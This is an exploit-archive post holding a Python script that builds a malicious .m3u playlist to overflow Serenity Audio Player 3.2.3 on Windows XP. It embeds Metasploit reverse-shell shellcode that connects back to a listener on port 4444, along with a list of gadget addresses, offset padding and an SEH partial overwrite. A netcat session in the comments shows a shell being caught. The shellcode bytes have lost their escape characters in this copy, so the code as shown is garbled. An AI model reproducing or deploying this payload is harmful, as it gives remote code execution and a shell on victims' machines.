serenityaudio-overflow.txt
Posted on 25 November 2009
#!/usr/bin/python # # ###################################################################### # # Exploit Title : Serenity Audio Player Playlist (.m3u) BOF # Author : mr_me # Author contact : seeleymagic[at]hotmail[dot]com # Date : nov 24th, 2009 # Type : local and remote code execution # OS : Windows XP sp3 # Product : Serenity Audio Player # Version : <= 3.2.3 # Download : http://malsmith.kyabram.biz/serenity/ # # ###################################################################### # # Description: # # Serenity is a playlist based audio player for Windows. It features a clean and simple # interface with minimal overhead. Formats supported are limited only by CODECs and # drivers installed on the machine. # # See the kind of p/p/r I have to deal with ? :P # # 0x004040e7 pop esi; pop ebp; retn 0x0010 # 0x00404482 pop esi; pop ebp; retn 0x0010 # 0x00404c95 pop ebx; pop ebp; retn 0x0010 # 0x00404dd3 pop edi; pop esi; retn 0x0004 # 0x004054cb pop esi; pop ebx; retn 0x0004 # 0x00405543 pop edi; pop esi; retn 0x0004 # 0x0040558b pop esi; pop ebx; retn 0x0008 # 0x00405641 pop esi; pop ebp; retn 0x0008 # 0x004057af pop ebp; pop ebx; retn 0x0008 # 0x00405855 pop ebx; pop ebp; retn 0x0014 # 0x00405bee pop esi; pop ebx; retn 0x0004 # # Visit corelanc0d3r's blog: http://www.corelan.be:8800/ # # mrme@home:~/serenity$ nc -lvp 4444 # listening on [any] 4444 ... # 192.168.2.13: inverse host lookup failed: Unknown server error : Connection timed out # connect to [192.168.2.14] from (UNKNOWN) [192.168.2.13] 3761 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Program FilesSerenity> # windows/shell_reverse_tcp - 287 bytes # http://www.metasploit.com # LHOST=192.168.2.14, EXITFUNC=seh, LPORT=4444 sc =( "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24" + "x8bx45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5f" + "x20x01xebx49x8bx34x8bx01xeex31xc0x99xacx84" + "xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x28" + "x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1c" + "x01xebx03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" + "x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40x08x5e" + "x68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" + "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50" + "xffxd6x5fx89xe5x66x81xedx08x02x55x6ax02xff" + "xd0x68xd9x09xf5xadx57xffxd6x53x53x53x53x43" + "x53x43x53xffxd0x68xc0xa8x02x0ex66x68x11x5c" + "x66x53x89xe1x95x68xecxf9xaax60x57xffxd6x6a" + "x10x51x55xffxd0x66x6ax64x66x68x63x6dx6ax50" + "x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95" + "x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" + "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51" + "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05" + "xcex53xffxd6x6axffxffx37xffxd0x68xe7x79xc6" + "x79xffx75x04xffxd6xffx77xfcxffxd0x68xf0x8a" + "x04x5fx53xffxd6xffxd0"); boom = ("http://"); boom += ("x41" * (992 -len(sc)-10)); # offset boom += ("x90" * 10) # some nops just incase boom += (sc) # shellcode boom +=("xe9xd4xfexffxff") # we're flying baby boom += ("xebxf9x90x90") # short jump back boom += ("xe8x47x40"); # partial overwrite.. sneaky file=open('mr_me_owns_serenity.m3u','w') file.write(boom) file.close() print "[+] mr_me_owns_serenity.m3u file created successfully"
